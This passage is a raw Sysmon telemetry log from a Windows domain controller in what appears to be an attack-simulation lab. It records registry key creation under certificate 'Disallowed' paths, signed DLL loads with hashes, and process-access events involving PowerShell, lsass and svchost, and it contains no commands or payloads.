12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347449Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347448Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347447Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347446Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347445Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347444Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347443Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347442Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347441Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347440Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347439Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347438Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347437Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347436Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347435Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.155{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347434Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.154{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347433Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.154{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347432Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.154{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347431Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.154{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347430Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.152{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 11241100x800000000000000057347429Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.118{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\pstransactions\20211112\PowerShell_transcript.WIN-DC-469.Gq64FQv+.20211112121843.txt2021-11-12 12:18:44.118 11241100x800000000000000057347428Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.118{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\pstransactions\202111122021-11-12 12:18:44.118 10341000x800000000000000057347427Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.116{8B6011A9-886E-6164-1600-00000000F101}13166900C:\Windows\System32\svchost.exe{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057347426Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.116{8B6011A9-886E-6164-1600-00000000F101}13161348C:\Windows\System32\svchost.exe{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057347425Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.115{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 11241100x800000000000000057347424Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.110{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057347423Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.110{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7150F9A23BA8351F5BE0646AB037B30A,SHA256=0EA53DDD2A8C3FD89581AEFA35AB64A5444AA2AEFAAFA91381011CA8604316E5falsetrue 10341000x800000000000000057347422Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.067{8B6011A9-886B-6164-0B00-00000000F101}648812C:\Windows\system32\lsass.exe{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057347421Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.067{8B6011A9-886B-6164-0B00-00000000F101}648812C:\Windows\system32\lsass.exe{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057347420Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.066{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057347419Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.066{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 12241200x800000000000000057347418Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.061{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347417Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.060{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347416Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347415Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347414Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347413Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347412Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347411Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347410Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347409Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347408Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347407Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347406Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347405Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347404Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057347403Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.877{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll10.0.14393.0 (rs1_release.160715-1616)Crypto SIP provider for signing and verifying PowerShell script files (.ps1/.ps1xml)Microsoft® Windows® Operating SystemMicrosoft Corporationpwrshsip.dllMD5=5366DEE11C59571EC48B56020E8949DE,SHA256=EE5CDBEDA2067413ACB7B5E7B4AF53B40336148CA104D1671212B43737EB348CtrueMicrosoft WindowsValid 12241200x800000000000000057347402Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347401Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347400Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347399Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347398Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347397Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347396Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347395Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347394Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347393Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.059{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347392Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.056{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347391Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.055{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347390Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.055{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347389Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.876{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\1d96a7ae85e0bc7620b8688b778d0d77\System.Numerics.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Numerics.dllMD5=E2F37D6662BF0951356738A4F5ADB453,SHA256=D9849E412FEF691733299C42A71A6EFFFD859C8E88A0F5283ECC1FE5761EC4CCfalse-Unavailable 11241100x800000000000000057347388Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.050{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057347387Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.049{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED73C662D497BD169851DBED092B1AD4,SHA256=0DC31B01C57F96BBB8280ED901A21118C5ECC043E638532EEB7C50AFB5E79B69falsetrue 12241200x800000000000000057347386Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.047{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347385Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.047{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347384Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.046{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347383Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.046{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347382Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.046{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347381Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.046{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347380Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.046{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347379Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.046{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347378Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.046{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347377Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.046{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347376Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.046{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347375Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347374Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057347373Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.871{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 12241200x800000000000000057347372Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 